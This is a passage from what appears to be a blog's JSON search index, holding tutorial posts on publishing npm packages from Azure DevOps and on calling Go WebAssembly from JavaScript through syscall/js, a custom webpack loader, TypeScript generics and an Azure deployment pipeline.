tag and then set the assets to the artifacts we want published (I publish the tgz and the generated JavaScript). I also chose to add Release Notes which I write into a file called ReleaseNotes.md in the git repo and publish as an artifact.\nNow when we create a release it not only goes to npm but it also goes to GitHub as a release, tags the commit and links the commits included in the release. Check it out here.\nConclusion And that is how we can do automated build and release of packages to npm and GitHub Releases from Azure DevOps. It really is quite simple!\nCommentary on 2FA for Publish My colleague Tierney Cyren pointed out that the above will not work if you’re using 2FA on Publish within npm. One possible workaround would be to have a manual gate on the release where you have to enter the OTP code as a variable before running the release and passing it as the CLI flag on publish. Otherwise, you’ll have an error such as this one in your release.\n", "id": "2019-02-18-releasing-to-npm-from-azure-devops" }, { "title": "Learning Golang through WebAssembly - Part 6, Go, WASM, TypeScript and React", "url": "https://www.aaron-powell.com/posts/2019-02-12-golang-wasm-6-typescript-react/", "date": "Tue, 12 Feb 2019 09:00:06 +1100", "tags": [ "golang", "wasm", "javascript", "webpack", "typescript", "react" ], "description": "Time to put all the pieces together and get something built!", "content": "Building an Application Welcome to the final article in our little series, congratulations, you’ve made it this far!\nSo far we’ve looked at a lot of little pieces which would eventually make an application and it’s time to tackle that, it’s time to build a web application.\nI’ve decided that for this application we’re going to piece together some other tools that you might commonly use, we’ll use React as a UI library and TypeScript as a compile-to-JavaScript language. But there’s no reason you couldn’t replace React with Vue, Angular or any other UI library, and drop TypeScript for ‘plain old JavaScript’. You’ll find the demo app on my GitHub.\nSetting up our Application To get started we’ll use create-react-app with TypeScript, I won’t go over doing that setup, the React documentation does a good job for me. You don’t have to use create-react-app, it’s just a really easy way to bootstrap, but if you’re confident without it, by all means skip this step.\nOnce you’re created an application though we’ll need to eject create-react-app because we need to be able to modify the webpack.config.js file, which can only be done if you eject create-react-app.\nGetting all WASM-y We’ll start by adding the loader created in the last post using npm or yarn:\n1 2 3 npm install --save-dev golang-wasm-async-loader # or yarn add golang-wasm-async-loader Then editing the configs/webpack.config.js file to add our loader (follow the instructions in the file for where to put it):\n1 2 3 4 { test: /\\.go$/, loader: 'golang-wasm-async-loader' }, Adding our WASM I’m going to make a little application that shows at least 2 number input fields and adds all the values together to get a sum, to Go code for it will look like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 package main import ( "strconv" "syscall/js" "github.com/aaronpowell/webpack-golang-wasm-async-loader/gobridge" ) func add(i ...js.Value) js.Value { ret := 0 for _, item := range i { val, _ := strconv.Atoi(item.String()) ret += val } return js.ValueOf(ret) } func main() { c := make(chan struct{}, 0) println("Web Assembly is ready") gobridge.RegisterCallback("add", add) <-c } Pretty basic, we use range to go over the spread of js.Value, convert each one from a string to a number, sum them up and return boxed in js.Value.\nNext up in our input field, I’ve created a file NumberInput.tsx for that:\n1 2 3 4 5 6 7 8 9 10 11 12 import * as React from 'react'; export interface NumberInputProps { value: number onChange: (value: number) => void } const NumberInput : React.SFC<NumberInputProps> = ({ value, onChange }) => ( <input type="number" value={value} onChange={(e) => onChange(parseInt(e.target.value, 10))} /> ); export default NumberInput; It’s a stateless component that receives two properties, a value for the input field and the callback to execute on change of the input field.\nLastly we’ll make our <App />:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 import * as React from 'react'; import wasm from './main.go'; import NumberInput from './NumberInput'; const { add } = wasm; interface State { value: number[] result: string } class App extends React.Component<{}, State> { constructor(props: {}) { super(props); this.state = { value: [0, 0], result: '0' }; } async updateValue(index: number, value: number) { //todo } render() { return ( <div> <p>Enter a number in the box below, on change it will add all the numbers together. Click the button to add more input boxes.</p> {this.state.value.map((value, index) => <NumberInput key={index} value={value} onChange={i => this.updateValue(index, i)} /> )} <button type="button" onClick={() => this.setState({ value: [...this.state.value, 0]})}>More inputs!</button> <p>Value now is {this.state.result}</p> </div> ); } } export default App; Ok, pretty basic, it’s component with state (sorry, no redux or hooks here 😝) where state contains an array of input values and the current sum. The render will loop over the input values, create our <NumberInput /> component with the value and give it a function that will call updateValue when done. State it initialised to have 2 inputs, but you can add more with a button shown on screen.\nAt the top of the file you’ll see that we’re importing the main.go file from above and using destructing assignment to get out the add function, or more accurately, a reference to it from the Proxy the loader creates for us.\nNow it’s time to complete our updateValue method. But it turns out that using the add function could be a bit tricky. Sure we can define it as an any property of the WASM, but what if we wanted to be more intelligent in the way it is represented?\n1 2 3 4 5 6 async updateValue(index: number, value: number) { let newValues = this.state.value.slice(); newValues[index] = value let result = await add<number, string>(...newValues); this.setState({ value: newValues, result }); } Using Types with our Proxy How do we make sure that TypeScript knows what type our arguments are that are to be passed into a function that, well, doesn’t exist? Ultimately we want to get away from an any, instead we want to use TypeScript generics!\nWe can do this in one of two ways, the first is we just create a definition file that creates an explicit interface for our WASM import:\n1 2 3 4 5 6 7 8 declare module "*.go" { interface GoWrapper { add: (...params: number[]) => Promise<string> } var _: GoWrapper export default _ } I’ve created a file called definitions.d.ts that sits alongside the App.tsx file, and by declaring the module for *.go it means that this declaration file works for any imports of Go files. We can also drop the generic arguments, which is nice, but it is a problem it we want to start adding more Go functions, we keep having to edit this file to include them.\nSo how about going crazy with generic!\n1 2 3 4 5 6 7 8 declare module "*.go" { interface GoWrapper { [K: string]: <T = any, R = any>(...params: T[]) => Promise<R> } var _: GoWrapper export default _ } Now, stick with me as we break it down:\nWe’re saying we have keys of the type (GoWrapper) that are strings with [K: string] Each key has a type that takes two generic arguments, an input and an output, that’s <T = any, R = any> These go into a function with T being a params array, denoted by (...params: T[]) The return type is a Promise using the specified return type, Promise<R> So when we do add<number, string> it says that were passing in an indeterminate number of arguments that are all numbers and it’ll return a string asynchronously.\nThis forced type flow down from our state and back, all through the magic of TypeScript types!\nIf you were working with mixed types in the arguments to the function we could do something like:\n1 let result = await something<string | number, string>("hello", 1, "world"); Using the | tells TypeScript that the arguments into the function are a string or number type, but not function, boolean, etc.. Pretty crazy right!\nDeploying our Application We’re done! It works locally! Now it’s time to deploy it somewhere.\nI’m going to use Azure DevOps Pipelines to build and then deploy it as an Azure Blob Static Website.\nBuilding To build you’ll need to run the following steps:\nInstall our Go dependencies Install our npm packages Run webpack Copy the required files as a build artifact I’ve created an Azure DevOps YAML build that is in the GitHub repo. It’s modeled on the standard Node.js pipeline but I’ve added the specific Go steps.\nThe things of note are that you’ll need to install the appropriate Go packages with go get. To use the gobridge I created for the loader you’ll need to set the GOOS and GOARCH too:\n1 2 3 - script: | GOOS=js GOARCH=wasm go get "github.com/aaronpowell/webpack-golang-wasm-async-loader/gobridge" displayName: 'install gobridge' You’ll also need to make sure that GOPATH and GOROOT are environment variables available to the loader. By default these aren’t set as environment variables in the agent, I just did it inline:\n1 2 3 4 - script: | npm install GOPATH=$(go env GOPATH) GOROOT=$(go env GOROOT) npm run build displayName: 'npm install, run webpack' Alternatively, you can create them for all tasks:\n1 2 3 4 variables: GOBIN: '$(GOPATH)/bin' # Go binaries path GOROOT: '/usr/local/go1.11' # Go installation path GOPATH: '$(system.defaultWorkingDirectory)/gopath' # Go workspace path Here’s a completed build! (ignore all the failed ones before it 😆)\nRelease At the time of writing we don’t have support for releases in the YAML file for Azure DevOps Pipelines. I use the Azure File Copy task to copy all the files into the storage account I’m running in, followed by the Azure CLI task to set the WASM content type on the WASM file, otherwise it won’t be served correctly:\n1 az storage blob update --container-name "$web" --name "hello.wasm" --content-type "application/wasm" --account-name gowasm Remember to change hello.wasm to whatever your filename is! 😉\nHere’s a completed release!\nConclusion And we are done folks! Starting with no idea what WebAssembly is or how to write Go we’ve gone through a bunch of exploration into how it all works, what makes Go’s approach to WebAssembly a little tricky as a web developer and ultimately how we can introduce Go into the tool chain that we are familiar with these days building web applications.\nI do hope you’ve enjoyed this series as we’ve gone along. If you build anything exciting with Go and WASM please let me know!\n", "id": "2019-02-12-golang-wasm-6-typescript-react" }, { "title": "Learning Golang through WebAssembly - Part 5, Compiling With Webpack", "url": "https://www.aaron-powell.com/posts/2019-02-08-golang-wasm-5-compiling-with-webpack/", "date": "Fri, 08 Feb 2019 09:00:06 +1100", "tags": [ "golang", "wasm", "javascript", "webpack" ], "description": "It's time to bring this into a web devs toolchain", "content": "Bringing in a Web Devs Tool Chain Up until now we’ve been writing our Go code and then using the go build command to generate our WebAssembly bundle, and sure, this works fine, does what we need it to do, but it doesn’t really fit with how we web developers would be approaching it.\nUs web developers are not shy of using a compiler step, or at least a build task, whether you’re converting from one language to another using TypeScript/Fable/Flow/etc., down-leveling ESNext to ESNow or just doing bundling and minifying of multiple scripts into one, it’s rare to find a JavaScript application these days that it’s using a tool like gulp, rollup, parcel or webpack.\nI prefer webpack so I decided to look at incorporating it into my process by writing a custom Loader.\nA Quick Intro to webpack If you’re unfamiliar with webpack you really should check out their docs as I won’t do it justice here. Instead I want to focus on the core part of webpack that we need to leverage and how it works.\nBecause webpack is designed to be a generic module bundler it doesn’t understand how to deal with different languages, whether that’s JSX in React, TypeScript or in our case Go. For that we need to bring in a Loader. A Loader is essentially a JavaScript function that takes the contents of the file you’re “loading” and expects you to return some JavaScript that can be run in the generated bundle.\nThis means that in our JavaScript file we can write the following:\n1 import foo from './bar.go'; And tell webpack to use the right loader when it finds a *.go file to hopefully generate what we need it to generate.\nUltimately, our goal is to be able to write something like this:\n1 2 3 4 5 6 7 8 import wasm from './main.go'; async function init() { let result = await wasm.printMessage('Hello from Go, via WASM, using webpack'); console.log(result); } init(); Now let’s look at how we achieve this.\nCreating a Loader TL;DR: If you don’t really want to see the process you can just check out the source code for the loader and install it into your own project.\nAs I mentioned above, the loader that we create is just a JavaScript function that receives the contents of the file we’re loading passed into it, meaning we’ll get our raw Go code, which is not particularly helpful because we need to pass the file path to go build, not the file contents.\nBut never fear, the loader has a Loader API that we can leverage, and the first thing is that we want to get resourcePath which gives us the full path to the file. Fantastic, now we are able to send that over to go build!\nGenerating WASM in our Loader We’re going to need to execute go build in our loader, and to do that we can use child_process to spawn it.\nBut before that we’ll need to find the path to the go binary and for that we’ll use the GOROOT environment variable (that we learnt about in the first post).\nFinally we’re going to use execFile which is asynchronous, and we’ll have to tell webpack that this loader is async.\nOur loader is starting to look like this (note: I’ve chosen to write this with TypeScript rather than plain ol’ JavaScript):\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 import * as webpack from "webpack"; import { execFile } from "child_process"; const getGoBin = (root: string) => `${root}/bin/go`; function loader(this: webpack.loader.LoaderContext, contents: string) { const cb = this.async(); const opts = { env: { GOPATH: process.env.GOPATH, GOROOT: process.env.GOROOT, GOOS: "js", GOARCH: "wasm" } }; const goBin = getGoBin(opts.env.GOROOT); const outFile = `${this.resourcePath}.wasm`; const args = ["build", "-o", outFile, this.resourcePath]; execFile(goBin, args, opts, (err) => { //todo }); } export default loader; I’m also creating the environment variables (in opts) that sets the appropriate GOOS and GOARCH for WASM.\nFor the file that we generate, I’ll just append .wasm to the end of the resource that we’re processing. This means that we should be fine writing to disk, but some error handling on the writability of the disk could be useful…\nGenerating JavaScript for webpack We’re successfully generating our WASM file but it’s a) dropped in what’s likely our src folder, not where the rest of the webpack bundles will go and b) we still have to write a bunch of code to use it.\nFor our objective of it being just like any other piece of JavaScript we’ll want to generate something to give back to webpack. But what will we need to generate?\nIf we think about it there are two things we need in JavaScript to use a Go WASM binary:\nwasm_exec.js The WebAssembly loader Well I think this is something that webpack should do for us, we don’t want to have to write that code ourselves!\nWe’re going to build up a large string template to send back to webpack, starting with the bootstrapper for WebAssembly:\n1 2 3 4 5 6 async function init() { const go = new Go(); let result = await WebAssembly.instantiateStreaming(fetch(...), go.importObject); go.run(result.instance); } init(); This code will be inserted into our bundle and used when we import wasm from './main.go', but that only starts up the WASM runtime, what about accessing the stuff we registered?\nI decided that I want to enforce the callback pattern from the last post, and that means we’ll need to return something, but what the heck should we return? We’ve got no idea what the names of the functions from Go will be, so how do we know what to return to the import statement?!\nJavaScript Proxies to the Rescue If you’ve ever done programming with Ruby you may have come across the method_missing method on BasicObject which you can use to do metaprogramming. In C# you can do a similar thing with the DLR.\nBut if you haven’t come across this, basically it’s a special function that gets executed on an object when there are no members of it that match, a last ditch attempt to handle an error before it is thrown.\nUnfortunately, JavaScript doesn’t have such a method, but we do have Proxy.\nA Proxy is a wrapper around an object that allows you to do interception of standard JavaScript operations, get, set, etc. and with this we can simulate the method_missing from Ruby.\nHere’s a basic example:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 let base = { foo: () => 'foo' }; let baseProxy = new Proxy(base, { get: (target, prop) => { console.log(`captured call to ${prop}`); if (target[prop]) { return target[prop]; } return () => 'method_missing'; } }); console.log(baseProxy.foo()); console.log(baseProxy.bar()); And we’ll see:\n> "captured call to foo" > "foo" > "captured call to bar" > "method_missing" So we can capture all calls and do something with them before, after or completely replace them.\nAnd we’re going to use that to wrap WASM with our callback pattern:\n1 2 3 4 5 6 7 8 9 10 11 12 13 let proxy = new Proxy( {}, { get: (_, key) => { return (...args) => { return new Promise((resolve, reject) => { let cb = (err, ...msg) => (err ? reject(err) : resolve(...msg)); window[key].apply(undefined, [...args, cb]); }; }; } } ); Because we register stuff on the global object our proxy is actually of a blank object, since we don’t really want to proxy window, and anyway we can just ignore the target that the proxy receives anyway.\nPutting it all together It’s time to put together our template that we’ll give back to webpack, and that will be executed when you import a Go file:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 const proxyBuilder = (filename: string) => ` let ready = false; const bridge = self || window || global; async function init() { const go = new Go(); let result = await WebAssembly.instantiateStreaming(fetch("${filename}"), go.importObject); go.run(result.instance); ready = true; } function sleep() { return new Promise(requestAnimationFrame); } init(); let proxy = new Proxy( {}, { get: (_, key) => { return (...args) => { return new Promise(async (resolve, reject) => { let run = () => { let cb = (err, ...msg) => (err ? reject(err) : resolve(...msg)); bridge[key].apply(undefined, [...args, cb]); }; while (!ready) { await sleep(); } if (!(key in bridge)) { reject(\\`There is nothing defined with the name "$\\{key\\}"\\`); return; } if (typeof bridge[key] !== 'function') { resolve(bridge[key]); return; } run(); }); }; } } ); export default proxy;`; Ok, it’s a little more advanced that the few snippets above, but let me explain some of the additions:\nSince we are asynchronously loading the WASM file using fetch there is the possibility that we’d try and use an exported function before it’s been made available. This would most likely happen if you have a large bundle and/or a slow network connection, so I’ve introduced a sleep function which uses requestAnimationFrame as a sleeper (so chucking stuff in the event loop) and waiting until the WASM initialization function completes and sets ready to true I’ve aliased the global that we’re working with so you can use the generated code in Node.js or a browser I’m not exposing it as a callback pattern, instead I’m exposing it as a Promise, meaning you can async/await with it I added some error handling, if you call a function that can’t be found the Promise is rejected It also supports setting values not just functions from Go Finishing our Loader Template? ✔\nGenerating WASM file? ✔\nTime to combine all of this together so that we can actually run the Loader.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 function loader(this: webpack.loader.LoaderContext, contents: string) { // omitted for brevity execFile(goBin, args, opts, (_, err) => { if (err) { cb(new Error(err)); return; } let out = readFileSync(outFile); unlinkSync(outFile); const emittedFilename = basename(this.resourcePath, ".go") + ".wasm"; this.emitFile(emittedFilename, out, null); cb( null, [ "require('!", join(__dirname, "..", "lib", "wasm_exec.js"), "');", proxyBuilder(emittedFilename) ].join("") ); }); } Remember how we generated the WASM file into the same location on disk as the original .go file? Well that’s fine to output as go build requires, but we actually want it to go with the rest of the webpack output. To do this we use the emitFile method on the loader context, providing it the contents of the file as a Buffer. That’s why I use readFileSync to get the file into memory, then I unlinkSync to delete it from disk, since the original output isn’t needed anymore.\nFinally I generate a require statement to the wasm_exec.js file that is bundled with the loader (I had to make a minor change to it so it worked with webpack). You’ll see this message in the debugging console:\n../lib/wasm_exec.js 9:19-26 Critical dependency: require function is used in a way in which dependencies cannot be statically extracted This is because the wasm_exec.js file is being added as a require statement to webpack but we’re not explicitly exporting anything from it (since it just augments the global scope), meaning webpack is unsure what we’re actually using in there and it can’t undertake tree shaking to remove unneeded code (and thus optimise the application).\nConclusion All the code for the loader is on GitHub and I’ve published the loader on npm as golang-wasm-async-loader. GitHub contains a (works on my machine) example of it in action if you’d like to try it out.\nBonus Round: Ditching Globals and Improving the Go Experience The astute observer among you will have looked at the source code published to GitHub and noticed it’s not quite what I posted above.\nOne thing that’s constantly irked me with the stuff I’d read from Go on how to work with WASM is that everything seems to use js.Global as a dumping place for their functions/values/etc. and that is rather unpleasant because you shouldn’t pollute window/global/self.\nI decided that I wanted my loader to address this and to also make it a little easier in Go to work with this, removing the need to understand the JavaScript callback pattern.\nSo the loader’s GitHub repository also contains a Go package called gobridge which gives you helpers to register functions and values in Go to JavaScript.\nThis means I can write some code like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 //+ build js,wasm package main import ( "strconv" "syscall/js" "github.com/aaronpowell/webpack-golang-wasm-async-loader/gobridge" ) func add(this js.Value, args []js.Value) (interface{}, error) { ret := 0 for _, item := range args { val, _ := strconv.Atoi(item.String()) ret += val } return ret, nil } func main() { c := make(chan struct{}, 0) println("Web Assembly is ready") gobridge.RegisterCallback("add", add) <-c } And use gobridge.RegisterCallback and not worry about working with js.FuncOf or where to register it in the JavaScript object graph.\nAnd that latter part is important because I don’t want to dump everything on global, I want to namespace it.\nLet’s update the JavaScript we’re generating in the Loader to include this:\n1 2 3 4 5 6 7 const g = self || window || global if (!g.__gobridge__) { g.__gobridge__ = {}; } const bridge = g.__gobridge__; Now our Go code can use that, via the gobridge and we don’t have to worry about trashing anything on window in the browser!\n", "id": "2019-02-08-golang-wasm-5-compiling-with-webpack" }, { "title": "Learning Golang through WebAssembly - Part 4, Sending a Response to JavaScript", "url": "https://www.aaron-powell.com/posts/2019-02-07-golang-wasm-4-response-to-javascript/", "date": "Thu, 07 Feb 2019 09:11:22 +1100", "tags": [ "golang", "wasm", "javascript" ], "description": "We've learnt how to write to the DOM, but how about returning values to JavaScript functions?", "content": "Returning to JavaScript We’ve learnt how we can use syscall/js to create and manipulate DOM elements from our Go functions, but what if we want to treat Go like a library and execute a function to get a value back? Maybe we have an image processing library we want to use that was written in Go, or we want to use some functionality that our core business application has in it.\nMy first thought was to create a function that returns a value:\n1 2 3 4 5 func printMessage(inputs []js.Value) string { message := inputs[0].String() return "Did you say " + message } And immediately we hit an error because js.FuncOf takes a signature of func(args []js.Value), meaning it takes a function that doesn’t return anything, a void function (if you were to C# it).\nRight, back to the drawing board.\nCallback Time! As JavaScript developers we are very use to things being asynchronously executed, or at least, implied async, and we’ve always done this with a callback pattern.\nIn Node.js this is really prevalent:\n1 2 3 4 const fs = require('fs'); fs.readFile('/path/to/file.txt', (err, data) => { // do stuff }); We pass a function as the last argument that thats two arguments, and error object and the output of the function executing successfully. We’d then test if err contained anything, throw if it does, continue if it doesn’t.\nThis then got me thinking, would it be so bad to implement that as a pattern when it comes to talking to Go? It seems logical, because we’re shelling out to another runtime, we shouldn’t have to wait for it to complete before we continue on in our application, we should treat it like an async operation.\nPreparing Go for callbacks Let’s start updating our Go code to handle the idea of this callback pattern. Since we’re given an array of js.Value we’ll have to make an assumption about where the callback lives in that array. I’m going to follow how Node.js has done it and make an assumption that the last argument passed in was the callback function.\n1 2 3 4 func printMessage(inputs []js.Value) { callback := inputs[len(inputs)-1:][0] // todo } This is the same as doing const callback = inputs.slice(inputs.length - 1) in JavaScript, we’re using the len Go function to take a subset of the array from the last item to the end (which will always be 1 item) and then grabbing that single value (since we get an array of length 1 and just need the value). Alternatively, you could write inputs[len(inputs)-1], but I’m just experimenting with Go syntax and trying to learn what things do.\nYou might want to do a Value.Type test against callback to make sure it is a JavaScript function and then fail if it isn’t, but I’m going to omit error handling for now.\nNow that we have a js.Value that represents our JavaScript callback we can call it using Value.Invoke, which is like Value.Call that we saw in the last post but for use when you have a value that is a function, not an object that has a function.\nBecause I’m using the err/data style with the callback I’ll pass null when there isn’t an error (you could also pass undefined, pick your poison).\nThis results in our Go function looking like so:\n1 2 3 4 5 6 func printMessage(inputs []js.Value) { callback := inputs[len(inputs)-1:][0] message := inputs[0].String() callback.Invoke(js.Null(), "Did you say " + message) } Updating our JavaScript With our Go code updated it’s time to improve how we call it from JavaScript:\n1 2 3 4 5 6 7 8 printMessage('JS calling Go and back again!', (err, message) => { if (err) { console.error(err); return; } console.log(message); }); Obviously I’m going pretty simplistic here and just writing a message to the console but you could be pushing that into a DOM element you create via JavaScript, it could be sent as a fetch request, or do anything else that you might want to do from a JavaScript application.\nConclusion We’ve now seen how we can really break down the barriers between Go and JavaScript and start treating Go functions just like any other function we might use in a JavaScript application, whether they have come from another JavaScript module, the browser or the runtime.\nTreating it like an async operation and using the callback pattern really makes it feel like just any old piece of JavaScript that you might be working with. It does become a bit cumbersome in the Go side of things, but so far that’s been my experience with Go’s approach to WebAssembly, it’s either all in on Go or no Go (zing!).\nBonus - Promisifying Go The callback pattern is fine, but it can lead to callback hell. It also means we can’t use the sexy new async/await keywords.\nLet’s just wrap it with a Promise!\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 function printMessagePromise(msg) { return new Promise((resolve, reject) => { printMessage(msg, (err, message) => { if (err) { reject(err); return; } resolve(message); }); }); } async function doStuff() { let msg = await printMessagePromise('JS calling Go and back again!'); console.log(msg); } doStuff(); Alternatively you could pass in the resolve and reject callbacks and then Go makes a decision in which to invoke, but I prefer the callback pattern as it introduces less decision trees in the Go codebase.\n", "id": "2019-02-07-golang-wasm-4-response-to-javascript" }, { "title": "Learning Golang through WebAssembly - Part 3, Interacting with JavaScript from Go", "url": "https://www.aaron-powell.com/posts/2019-02-06-golang-wasm-3-interacting-with-js-from-go/", "date": "Wed, 06 Feb 2019 09:00:07 +1100", "tags": [ "golang", "wasm", "javascript" ], "description": "Looking at interop between Go and JavaScript via WASM", "content": "Runtime interop In the last post we wrote our first bit of Go and used it to write a message out to the dev tools console, which is useful in terms of proving that something worked, but not really useful for an end user. For that we really need to do something that allows the JavaScript and WASM runtimes to talk to each other.\nFor this we’re going to use a package called syscall/js which is part of Go 1.11 and provides us with some basic functions to undertake interop.\nAnd this is where we start seeing that Go’s approach to WASM is quite different to other languages.\nUnderstanding syscall/js Before we dive into anything too deep I want to look a bit at syscall/js so we know how it works.\nAs you’ll see from the API docs that this is a very small package exposing a very small set of features. The most important thing that is exposed from the package is the type Value which is how Go represents data getting passed in from the JavaScript runtime, and how we request things in Go from the JavaScript runtime. This is kind of a dynamic type because it could be an int or a string or a function or an object, it really depends on how you use it, which does make it a little bit clunky to use.\nWriting to the DOM The first thing you might want to do is move away from writing to the console and instead write to the DOM.\nSite note: We’ll use raw syscall/js but if you’re doing serious DOM manipulation you might want to look at something like dennwc/dom which is a wrapper syscall/js and gives a nicer interface.\nLet’s create an element and then write a message to it before adding it to the DOM.\n1 2 3 4 5 6 func main() { document := js.Global().Get("document") p := document.Call("createElement", "p") p.Set("innerHTML", "Hello WASM from Go!") document.Get("body").Call("appendChild", p) } Compile this like we did in the last post and fire up your application to now see that you have a new element in the DOM with a message, rather than something in the console.\nLet’s break it down, first we’ve got js.Global(), this is a call to access the JavaScript global object, window or self, depending if it’s browser or node. This returns you a js.Value object that, through the magic of the Go runtime, will be the right thing.\nI’m then using the Value.Get function to access a property of the global object, document and then using the shorthand assignment := assigning that to a Go variable called document.\nSince document is of type js.Value we can then interact with it, and in-tern interact with the DOM, so I can use Value.Call to invoke a function of the object, createElement, passing in any arguments, "p" which returns the result as a js.Value, which in this case is the newly created DOM element, winding up in p.\nOn our new DOM element we can call Value.Set which will assign a property of the object, innerHTML to our message.\nFinally, we use Get to access body (from document) and Call the function appendChild, giving it p so our new element appears in the DOM as we would expect.\nPhew! See what I mean by it being a bit cumbersome? This is why I’d expect if you’re really getting serious about DOM interactions from Go that you’ll use a wrapper package or write your to fit your needs.\nCalling Go from JavaScript We’ve looked at going from Go to JavaScript but what if we want to go the other way and call into Go from JavaScript? After all, that’s one of the big draw cards of WASM, compiling a native module that would be overly complex to reproduce in JavaScript, but then using it from JavaScript just like any other function.\nAnd here is where we find the biggest problem I have with Go’s approach to WASM relative to the others (C/C++/Rust). Let’s say I want to do this:\n1 2 3 const el = document.createElement('p'); el.innerHTML = goRuntime.someFunction("hello"); document.body.appendChild('el'); We’re wanting to invoke a function, someFunction on the Go/WASM runtime from JavaScript. Ignoring the trivial nature of the code, this is the kind of thing that you’d want to do.\nNow in an ideal world of WASM we would get some exports provided to us (see the A Quick WebAssembly Primer of the last post), but Go doesn’t work that way, that’s not how we export functions. Instead we have to register them with the browser using Set and a FuncOf:\n1 js.Global().Set("someFunction", js.FuncOf(someFunction)) This will then create a global function called someFunction that you can invoke from JavaScript. Now it doesn’t have to be a global function, you could use js.Global().Get(...) and nest a bunch of Get’s to “namespace” your function, but you’d need to ensure that object exists in JavaScript first.\nI find this quite ugly as it really feels like you’re violating the encapsulation of WASM by not using the instance.exports that you should when you startup WASM.\nCreating a callable function Complaining aside, let’s get back to our example. Rather than hard-coding a message, let’s allow you to send it from JavaScript. We’ll create a new function for this and register the callback.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 package main import ( "syscall/js" ) func printMessage(this js.Value, inputs []js.Value) interface{} { message := inputs[0].String() document := js.Global().Get("document") p := document.Call("createElement", "p") p.Set("innerHTML", message) document.Get("body").Call("appendChild", p) } func main() { js.Global().Set("printMessage", js.FuncOf(printMessage)) } The main addition to this is the printMessage function, it takes an array of js.Value for arguments and doesn’t return a value.\nBut why does it take an array? Well apart from the fact that js.FuncOf requires it to, it’s because JavaScript can have as many arguments provided to a function as you like, you just name the ones you care about and handle the magic arguments (or define a spread) if you want more. And also, JavaScript has a pretty weak type system compared to Go, so while you might want a string there’s nothing stopping the caller passing in a number or a function, so Go forces you to use this boxed struct in js.Value and then you can unpack it as required using Value.String or Value.Int or whatever type you want.\nNow compile it, launch a browser, open the dev tools, call your globally declared function and you’ll get this error message:\nprintMessage("") wasm_exec.js:378 Uncaught Error: bad callback: Go program has already exited at global.Go._resolveCallbackPromise (wasm_exec.js:378) at wasm_exec.js:394 at <anonymous>:1:1 sad trombone\nGo + WASM is an Application, not a Library If you’ve done much reading on WASM then you’ll see that it’s intended to be treated like a library that you call out to, you use it to encapsulate functionality that would be hard to convert from C/C++/Rust to JavaScript, so you just load that native library and invoke the functions it exports.\nGo takes a different approach, Go treats this as an application, meaning that you start a Go runtime, it runs, then exits and you can’t interact with it. This, coincidentally, is the error message that you’re seeing, our Go application has completed and cleaned up.\nTo me this feels more closer to the .NET Console Application than it does to a web application. A web application doesn’t really end, at least, not in the same manner as a process.\nAnd this leads us to a problem, if we want to be able to call stuff, but the runtime want to shut down, what do we do?\nIntroducing Channels Basically we want to tell Go that we don’t want it to exit until we tell it that we want it to exit and the easiest way to do this is with a channel.\nA channel is something that waits for data to be sent into it and will pause the execution until it receives data on it.\nFirst off we’ll make the channel by adding this line into our main function:\n1 c := make(chan bool) We’re using the built-in make function, specifying the chan keyword with the type of data that we expect over the channel. The type is somewhat arbitrary since we’re never planning to push data over the channel, I just chose bool for fun.\nNow we need to tell the application to wait for the channel to receive data, we do this by adding this line where we want execution to pause:\n1 <-c This would make a main function look like so:\n1 2 3 4 5 func main() { c := make(chan bool) js.Global().Set("printMessage", js.FuncOf(printMessage)) <-c } Now if you build and run your application you can execute the printMessage function as many times as you like from the console!\nAs an aside, you can use channels for a lot more than stopping the application from quitting, such as combining channels with goroutines but they are beyond the scope of what I’m covering at this point.\nBonus - Using Channels to Kill You App We’re using a channel to “hold” out application open, but what if you did want to terminate it? Maybe there’s a scenario where you want to cleanup your WASM application, or maybe it’s only intended to be used for a short period of time before being shutdown?\nWell we can leverage the channel for that.\nHere’s a slightly modified version of the demo code:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 package main import ( "syscall/js" ) var c chan bool func init() { c = make(chan bool) } func printMessage(this js.Value, inputs []js.Value) interface{} { message := inputs[0].String() document := js.Global().Get("document") p := document.Call("createElement", "p") p.Set("innerHTML", message) document.Get("body").Call("appendChild", p) c <- true } func main() { js.Global().Set("printMessage", js.FuncOf(printMessage)) <-c println("We are out of here") } First thing you’ll notice is that I’ve defined the channel as a package-scoped variable with var c chan bool. This makes it available throughout this package, not just on the stack of the main function.\nNext I’ve introduced a function called init. We haven’t talked about init yet, but init is a special function that is called, if it exists, before the main function, allowing us to setup stuff that might need to be setup. Here I’m using it to setup the channel that we’re using.\nOur main function still waits for our channel to receive data, and after it does it’ll print out a message to the console. But what you will also notice is that inside printMessage I do push data over the channel on the last line I do:\n1 c <- true This puts the value true into the channel, which then flows through to the main function and since we’re not really doing anything on receive it just continues through, prints a message, and our application is done.\nPretty cool how you can control execution flow here with the channel.\nConclusion Today we looked at how we can start interacting with the DOM from our Go WASM application and then how we can get JavaScript to interact with WASM. Sure, much of how we did our interaction was via the dev tools to invoke the printMessage function we’re defining, but you can see how we might be able to make it a bit smarter and bind that to an event on the page instead.\nWe’ve also seen one of the painful parts of Go’s approach to WASM, that it’s treated like an application not a library, and that we have to do something that feels a little dirty to ensure it is always available within our JavaScript application. This does feel like a design choice of Go on how to leverage WASM, but it still is quite jarring when you compare it to the rest of the WASM information you’ll find on the web.\n", "id": "2019-02-06-golang-wasm-3-interacting-with-js-from-go" }, { "title": "Learning Golang through WebAssembly - Part 2, Writing your first piece of Go", "url": "https://www.aaron-powell.com/posts/2019-02-05-golang-wasm-2-writing-go/", "date": "Tue, 05 Feb 2019 09:00:56 +1100", "tags": [ "golang", 